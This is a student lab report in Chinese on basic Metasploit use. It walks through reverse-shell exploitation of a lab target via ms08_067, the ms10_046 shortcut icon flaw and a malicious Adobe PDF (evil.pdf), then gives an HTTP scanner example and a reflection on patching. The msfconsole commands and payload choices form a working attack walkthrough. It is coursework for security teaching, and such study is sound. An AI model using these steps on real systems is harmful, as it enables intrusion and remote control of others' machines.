20155233 《网络对抗》 Exp5 MSF基础应用

时间:2023-03-08 22:39:48
20155233 《网络对抗》 Exp5 MSF基础应用

主动攻击:ms08_067漏洞攻击

  1. 启用msf终端msfconsole然后使用search命令搜索该漏洞对应的模块:search ms08_067
    20155233 《网络对抗》 Exp5 MSF基础应用

  2. 选择输入use exploit/windows/smb/ms08_067_netapi,之后查看信息:show payloads,选择攻击载荷set payload generic/shell_reverse_tcp

  3. 查看配置渗透攻击所需的配置项show options,查看渗透攻击模块所能成功渗透攻击的目标平台show targets
    20155233 《网络对抗》 Exp5 MSF基础应用
    20155233 《网络对抗》 Exp5 MSF基础应用

  4. 根据目标情况配置渗透攻击的各个选项
    20155233 《网络对抗》 Exp5 MSF基础应用

  5. 回连成功,进行相关命令测试
    20155233 《网络对抗》 Exp5 MSF基础应用

对浏览器攻击:ms10_046漏洞攻击

  1. 基本步骤同上,先利用指令search ms10_046找到可以攻击的模块
    20155233 《网络对抗》 Exp5 MSF基础应用

  2. 我们这里选择第一个,输入命令use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    20155233 《网络对抗》 Exp5 MSF基础应用

  3. 输入show payloads选择攻击载荷,我们选择generic/shell_reverse_tcp,输入命令set payload generic/shell_reverse_tcp使用
    20155233 《网络对抗》 Exp5 MSF基础应用

  4. 根据目标情况配置渗透攻击的各个选项,输入命令show options查看配置设置并进行修改
    20155233 《网络对抗》 Exp5 MSF基础应用

  5. 输入exploit执行
    20155233 《网络对抗》 Exp5 MSF基础应用

  6. 可以看到生成了所需的URL,在靶机浏览器访问后,kal得到相应但没有出现预期效果
    20155233 《网络对抗》 Exp5 MSF基础应用

  7. 对配置进行修改,选用set payload windows/meterpreter/reverse_tcp,设置后查看结果,输入sessions查看到一个ID号为1的会话
    20155233 《网络对抗》 Exp5 MSF基础应用

  8. 使用sessions -i 1选择会话1,成功获取了靶机的shell,利用systeminfo指令查看靶机的系统信息
    20155233 《网络对抗》 Exp5 MSF基础应用

对Adobe的漏洞攻击:adobe_pdf_embedded_exe

  1. 输入search adobe查询和adobe漏洞有关的模块,我选择exploit/windows/fileformat/adobe_pdf_embedded_exe
    20155233 《网络对抗》 Exp5 MSF基础应用

  2. 选择攻击载荷payload,这里我选windows/meterpreter/reverse_tcp
    20155233 《网络对抗》 Exp5 MSF基础应用

  3. 输入命令set payload windows/meterpreter/reverse_tcp使用攻击载荷
    20155233 《网络对抗》 Exp5 MSF基础应用

  4. 根据目标情况配置渗透攻击的各个选项
    20155233 《网络对抗》 Exp5 MSF基础应用

  5. 执行,查看结果
    20155233 《网络对抗》 Exp5 MSF基础应用

  6. 可以看到在相应目的生成了evil.pdf,我们来将它发送到靶机
  7. 输入相关命令打开监听
    20155233 《网络对抗》 Exp5 MSF基础应用

  8. 回连成功,输入命令查看系统信息
    20155233 《网络对抗》 Exp5 MSF基础应用

辅助模块的应用:scanner/http/options,功能Display available HTTP options for each system

  1. 输入命令show auxiliary查看辅助模块,并挑选使用scanner/http/options
  2. 输入命令use scanner/http/options,输入info查看信息
    20155233 《网络对抗》 Exp5 MSF基础应用
  3. 设置参数
    20155233 《网络对抗》 Exp5 MSF基础应用

  4. exploit执行
    20155233 《网络对抗》 Exp5 MSF基础应用

基础问题回答

  1. 用自己的话解释什么是exploit,payload,encode.
    exploit是漏洞利用,我们执行exploit后,我们所运送的程序或代码就开始去寻找漏洞,并控制它为我们服务。
    payload是有效载荷,在我们执行exploit后,谁来运送程序或代码呢?这个payload就是关键的一个环节。
    encode是编码,对我们的程序或代码进行伪装,使其避免被查收。

实验体会

通过本次实验,使我加深了对平时计算机下补丁的意识,本次实验是让我们知道如何根据特定漏洞去攻击特定系统,一个漏洞只能攻击没有装相应补丁的系统,可想而知漏洞的重要性,如果漏洞被发现,而没有装补丁,我们的系统就赤裸裸的暴露在黑客手下,而我们却毫不自知,所以我们要及时安装补丁,要养成网络安全意识,尽可能避免病毒、木马的入侵,提高专业知识,掌握相应技能。